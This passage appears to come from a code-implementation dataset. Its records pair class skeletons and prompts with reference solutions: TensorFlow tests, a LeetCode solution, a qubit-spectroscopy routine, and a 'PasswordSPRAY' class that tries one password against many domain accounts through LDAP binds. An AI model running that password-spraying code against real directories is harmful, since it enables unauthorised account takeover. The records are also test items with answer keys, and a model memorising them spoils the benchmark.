tf.contrib.layers.real_valued_column('age')\ntarget_column = layers.multi_class_target(n_classes=2)\nclassifier = LinearEstimator(target_column, feature_columns=[age, language])\nclassifier.fit(input_fn=input_fn, steps=1000)\nloss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\nclassifier.fit(input_fn=input_fn, steps=2000)\nloss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\nself.assertLess(loss2, loss1)\nself.assertLess(loss2, 0.01)", "cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\ntarget_column = layers.multi_class_target(n_classes=3)\nclassifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\nclassifier.fit(input_fn=_iris_input_fn, steps=1000)\nclassifier.evaluate(input_fn=_iris_input_fn, steps=100)"], "bodies_text": "<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ComposableModelTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000069", "length_bytes": 4936, "license_type": "permissive", "methods": [{"docstring": "Tests that loss goes down with training.", "name": "testLinearModel", "signature": "def testLinearModel(self)"}, {"docstring": "Tests multi-class classification using matrix data as input.", "name": "testDNNModel", "signature": "def testDNNModel(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ComposableModelTest` described below.\n\nClass description:\nImplement the ComposableModelTest class.\n\nMethod signatures and docstrings:\n- def testLinearModel(self): Tests that loss goes down with training.\n- def testDNNModel(self): Tests multi-class classification using matrix data as input.", "prompted_full_text": "Implement the Python class `ComposableModelTest` described below.\n\nClass description:\nImplement the ComposableModelTest class.\n\nMethod signatures and docstrings:\n- def testLinearModel(self): Tests that loss goes down with training.\n- def testDNNModel(self): Tests multi-class classification using matrix data as input.\n\n<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n<|end_body_0|>\n\n<|body_start_1|>\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n<|end_body_1|>\n", "revision_id": "6d39eeb66c63a6f0f7895befc588c9eb1dd105f9", "skeleton": "<|skeleton|>\nclass ComposableModelTest:\n\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n <|body_0|>\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ComposableModelTest:\n def testLinearModel(self):\n \"\"\"Tests that loss goes down with training.\"\"\"\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = layers.multi_class_target(n_classes=2)\n classifier = LinearEstimator(target_column, feature_columns=[age, language])\n classifier.fit(input_fn=input_fn, steps=1000)\n loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n classifier.fit(input_fn=input_fn, steps=2000)\n loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\n self.assertLess(loss2, loss1)\n self.assertLess(loss2, 0.01)\n\n def testDNNModel(self):\n \"\"\"Tests multi-class classification using matrix data as input.\"\"\"\n cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\n target_column = layers.multi_class_target(n_classes=3)\n classifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\n classifier.fit(input_fn=_iris_input_fn, steps=1000)\n classifier.evaluate(input_fn=_iris_input_fn, steps=100)\n", "source": "the_stack_v2_python_sparse", "source_path": "jni-build/jni/include/tensorflow/contrib/learn/python/learn/estimators/composable_model_test.py", "source_repo": "Lab603/PicEncyclopedias", "split": "test", "star_events_count": 6} {"blob_id": "d8e4e6c538261220281f8af300add7742b332b82", "bodies": ["d = {}\nk = {}\nstart = 0\nstep = 0\nfor i in range(8):\n start = start | cells[i] << i\nd[start] = step\nk[step] = start\nnn = 0\nwhile nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\nans = [0] * 8\nfor i in range(8):\n ans[i] = start >> i & 1\nreturn ans", "d = {}\nk = {}\nstart = 0\nstep = 0\nfor i in range(8):\n start = start | cells[i] << i\nd[start] = step\nk[step] = start\nnn = 0\nwhile nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\nans = [0] * 8\nfor i in range(8):\n ans[i] = start >> i & 1\nreturn ans"], "bodies_text": "<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000070", "length_bytes": 1587, "license_type": "no_license", "methods": [{"docstring": ":type cells: List[int] :type N: int :rtype: List[int]", "name": "prisonAfterNDays", "signature": "def prisonAfterNDays(self, cells, N)"}, {"docstring": ":type cells: List[int] :type N: int :rtype: List[int]", "name": "raw", "signature": "def raw(self, cells, N)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001077", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def prisonAfterNDays(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n- def raw(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def prisonAfterNDays(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n- def raw(self, cells, N): :type cells: List[int] :type N: int :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n<|end_body_1|>\n", "revision_id": "8075fbb40987d5e6af8d30941a19fa48a3320f56", "skeleton": "<|skeleton|>\nclass Solution:\n\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_0|>\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def prisonAfterNDays(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n nn += 1\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n if start in d:\n T = nn - d[start]\n t_ = d[start] + (N - d[start]) % T\n start = k[t_]\n break\n d[start] = step\n k[step] = start\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n\n def raw(self, cells, N):\n \"\"\":type cells: List[int] :type N: int :rtype: List[int]\"\"\"\n d = {}\n k = {}\n start = 0\n step = 0\n for i in range(8):\n start = start | cells[i] << i\n d[start] = step\n k[step] = start\n nn = 0\n while nn < N:\n step += 1\n start = ~((start ^ start << 2) >> 1) & 126\n d[start] = step\n k[step] = start\n nn += 1\n ans = [0] * 8\n for i in range(8):\n ans[i] = start >> i & 1\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "p957/Solution.py", "source_repo": "carwestsam/leetCode", "split": "test", "star_events_count": 4} {"blob_id": "a164b4fa59a69e1154a25238695a2d4c0fc69a16", "bodies": ["self.__domain = domainName\nself.__kdcHost = serverIP\nself.__domainUsers = domainusers\nself.__sprayPassword = sprayPassword\nself.DomainUserRequest()", "domain = '@' + self.__domain\nfor user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)", "self.__sprayusers = []\nsimpleServer = Server(self.__kdcHost, get_info='ALL')\nsimpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\nif simpleConn.bind():\n self.__sprayusers.append(username)"], "bodies_text": "<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PasswordSPRAY", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000071", "length_bytes": 1067, "license_type": "permissive", "methods": [{"docstring": "Spray Attack Arguments", "name": "AttackArguments", "signature": "def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName)"}, {"docstring": "Pars to Domain", "name": "DomainUserRequest", "signature": "def DomainUserRequest(self)"}, {"docstring": "Attack Part", "name": "AttackToTarget", "signature": "def AttackToTarget(self, username)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001412", "prompt": "Implement the Python class `PasswordSPRAY` described below.\n\nClass description:\nImplement the PasswordSPRAY class.\n\nMethod signatures and docstrings:\n- def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName): Spray Attack Arguments\n- def DomainUserRequest(self): Pars to Domain\n- def AttackToTarget(self, username): Attack Part", "prompted_full_text": "Implement the Python class `PasswordSPRAY` described below.\n\nClass description:\nImplement the PasswordSPRAY class.\n\nMethod signatures and docstrings:\n- def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName): Spray Attack Arguments\n- def DomainUserRequest(self): Pars to Domain\n- def AttackToTarget(self, username): Attack Part\n\n<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n<|end_body_0|>\n\n<|body_start_1|>\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n<|end_body_1|>\n\n<|body_start_2|>\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n<|end_body_2|>\n", "revision_id": "92263ea73bd2eaa2081fb277c76aa229103a1d54", "skeleton": "<|skeleton|>\nclass PasswordSPRAY:\n\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n <|body_0|>\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n <|body_1|>\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PasswordSPRAY:\n def AttackArguments(self, serverIP, domainusers, sprayPassword, domainName):\n \"\"\"Spray Attack Arguments\"\"\"\n self.__domain = domainName\n self.__kdcHost = serverIP\n self.__domainUsers = domainusers\n self.__sprayPassword = sprayPassword\n self.DomainUserRequest()\n\n def DomainUserRequest(self):\n \"\"\"Pars to Domain\"\"\"\n domain = '@' + self.__domain\n for user in self.__domainUsers:\n targetuser = user + domain\n self.AttackToTarget(targetuser)\n\n def AttackToTarget(self, username):\n \"\"\"Attack Part\"\"\"\n self.__sprayusers = []\n simpleServer = Server(self.__kdcHost, get_info='ALL')\n simpleConn = Connection(simpleServer, user=username, password=self.__sprayPassword)\n if simpleConn.bind():\n self.__sprayusers.append(username)\n", "source": "the_stack_v2_python_sparse", "source_path": "pentestui/pentest_api/enumeration/ldap/spray/sprayattack.py", "source_repo": "mustgundogdu/PentestUI", "split": "test", "star_events_count": 31} {"blob_id": "265d8e1b2f842eb1761661a7212ee27d8a02a985", "bodies": ["super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\nself.fluxlines_dict = fluxlines_dict\nroutines_utils.append_DCsources(self)\nself.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\nfor qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\nself._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\nself.final_init(**kw)", "super().create_routine_template()\nfor i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)", "for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\nif self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\nsuper().post_run()"], "bodies_text": "<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "class_docstring": "AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2", "class_name": "ParkAndQubitSpectroscopy", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000072", "length_bytes": 9956, "license_type": "permissive", "methods": [{"docstring": "Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta", "name": "__init__", "signature": "def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw)"}, {"docstring": "Creates routine template.", "name": "create_routine_template", "signature": "def create_routine_template(self)"}, {"docstring": "Save the results of the routine.", "name": "post_run", "signature": "def post_run(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002126", "prompt": "Implement the Python class `ParkAndQubitSpectroscopy` described below.\n\nClass description:\nAutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 